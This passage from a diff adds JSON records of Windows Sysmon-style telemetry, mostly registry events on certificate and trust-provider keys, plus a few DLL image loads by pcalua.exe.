"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"image_load", + "image_name": "duser.dll", + "image_path": "C:\\Windows\\System32\\duser.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573975110000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", 
+ "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "atlthunk.dll", + "image_path": "C:\\Windows\\System32\\atlthunk.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573975259984, + 
"unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_value": "W32:000000000008056A", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": 
"HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", + "registry_value": "SequenceNumber", + "timestamp": 131883573975580000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + 
"process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573975740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 